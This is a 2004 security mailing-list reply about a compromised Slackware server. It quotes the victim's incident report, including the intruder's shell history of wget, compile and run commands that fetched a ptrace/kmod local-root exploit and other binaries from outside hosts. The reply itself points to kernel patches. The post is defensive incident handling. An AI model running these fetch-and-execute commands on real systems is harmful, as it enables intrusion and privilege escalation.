Re: Visited by a cracker

From: Manuel Arostegui Ramirez (manuel_at_todo-linux.com)
Date: 07/12/04

  • Next message: Arthur Chan: "Re: Visited by a cracker"
    To: "Per Christian B. Viken" <perchr@angryadmin.net>, <focus-linux@securityfocus.com>
    Date: Mon, 12 Jul 2004 14:58:04 +0200
    
    

    El Domingo 11 Julio 2004 16:45, Per Christian B. Viken escribió:
    > Hello
    >
    > I've had a rather disturbing evening.
    > A friend of mine runs a small server for himself and some friends. It's
    > running slackware 10.
    > When I logged in, I noticed that the load was way over what's normal
    > (around 1.36 now, usually it's under 0.10), so I run 'top'. I see a program
    > called 'strace' running, hogging all the cpu power.
    >
    > So I get curious. I chdir to the users home, and looks around. It's empty.
    > But, the 'smart' little cracker has forgotten about .bash_history, so here
    > I can see everything that he has been doing.
    > Aparently, he has downloaded and setup an eggdrop, removed it again, and
    > then downloaded a psybnc, which he also removed shortly. Then things get
    > interesting.
    >
    > <SNIP>
    > wget http://personal.telefonica.terra.es/web/alexb/e/ptrace-kmod.c
    > gcc ptrace-kmod.c -o ptrace
    > ./ptrace
    > chmod +x ptrace
    > ./ptrace
    > rm -rf ptrace
    > ls
    > rm -rf ptrace-kmod.c
    > wget www.drac.as.ro/egx
    > chmod +x egx
    > ./egx
    > who
    > passwd
    > Uptime
    > <SNIP>
    > ./egx
    > rm -rf egx
    > wget 220.88.27.11/usage/apache.tar.gz
    > </SNIP>
    >
    > The ptrace-kmod.c has this for a header:
    > /*
    > * Linux kernel ptrace/kmod local root exploit
    > *
    > * This code exploits a race condition in kernel/kmod.c, which creates
    > * kernel thread in insecure manner. This bug allows to ptrace cloned
    > * process, allowing to take control over privileged modprobe binary.
    > *
    > * Should work under all current 2.2.x and 2.4.x kernels.
    >
    > Luckily, the server runs 2.6.6, so this wasn't any threat.
    > The 'egx' executable seems to be somewhat like the other, cause when I run
    > it, it outputs '[-] Unable to determine kernel address: Operation not
    > supported' and dies.
    >
    > My guesses are that the apache.tar.gz-file is also some kind of exploit,
    > but I couldn't get it, so I didn't get a chance to see.
    >
    > Seeing that he didn't know how to properly hide his tracks, I hoped he
    > might be stupid enough to use his own IP to log in from as well, so I run
    > 'cat /var/log/messages | grep <username>'.
    > But, he has logged in and out using 7 different Ips. 5 belonging to
    > Pakistan, and the other two to Libanon.
    >
    > I've been suspicious to this user since my friend added him a few days ago.
    > He actually got a domain, prepaid for three years for an account, so I did
    > have some concerns about this.
    > Now, after discovering this, I've talked with my friend, and the credit
    > card used to paying for the domain, belongs to a woman in the UK. Probably
    > stolen or something.
    >
    > I've run chkrootkit 0.43 and Rootkit Hunter 1.1.1 and they didn't find
    > anything.
    > So, my real question is:
    >
    > Is there anything else I should check out? Anywhere else some nasty
    > exploits or trojans might be hiding? And should I try to find this guy? Or
    > is it probably hopeless?
    >
    > Best Regards,
    > Per Christian B. Viken

    Have you patched the local bug, which can crash your machine and the only
    solution is reboot it.
    This could be scary serious if you're running some kind of server on that
    machine and its kernel it's not patched.
    Here you are some information and patchs
    http://linuxreviews.org/news/2004/06/11_kernel_crash/
    http://marc.theaimsgroup.com/?l=linux-kernel&m=108704334308688&w=2

    Best regards
    Manuel


  • Next message: Arthur Chan: "Re: Visited by a cracker"

    Relevant Pages

    • Re: Visited by a cracker
      ... > A friend of mine runs a small server for himself and some friends. ... > chmod +x ptrace ... > chmod +x egx ... > * kernel thread in insecure manner. ...
      (Focus-Linux)
    • Re: Visited by a cracker
      ... Double check for trojans on your processes. ... > chmod +x ptrace ... > chmod +x egx ... > I've been suspicious to this user since my friend added him a few days ago. ...
      (Focus-Linux)
    • Re: Visited by a cracker
      ... > A friend of mine runs a small server for himself and some friends. ... > chmod +x ptrace ... > chmod +x egx ...
      (Focus-Linux)
    • Re: DOS Attack Update block by referer
      ... > Pentium III Desktop with Microsoft Windows 2000 Server. ... > along with many of his business sites to launch the inline frame attack ... > slowly and when my friend agreed to publicly say she was "owned" by him. ... > For more information on this free incident handling, ...
      (Incidents)
    • Re: Visited by a cracker
      ... > chmod +x ptrace ... > chmod +x egx ... > I've been suspicious to this user since my friend added him a few days ago. ... Try to find the last modified files (is you have some md5 checksums at ...
      (Focus-Linux)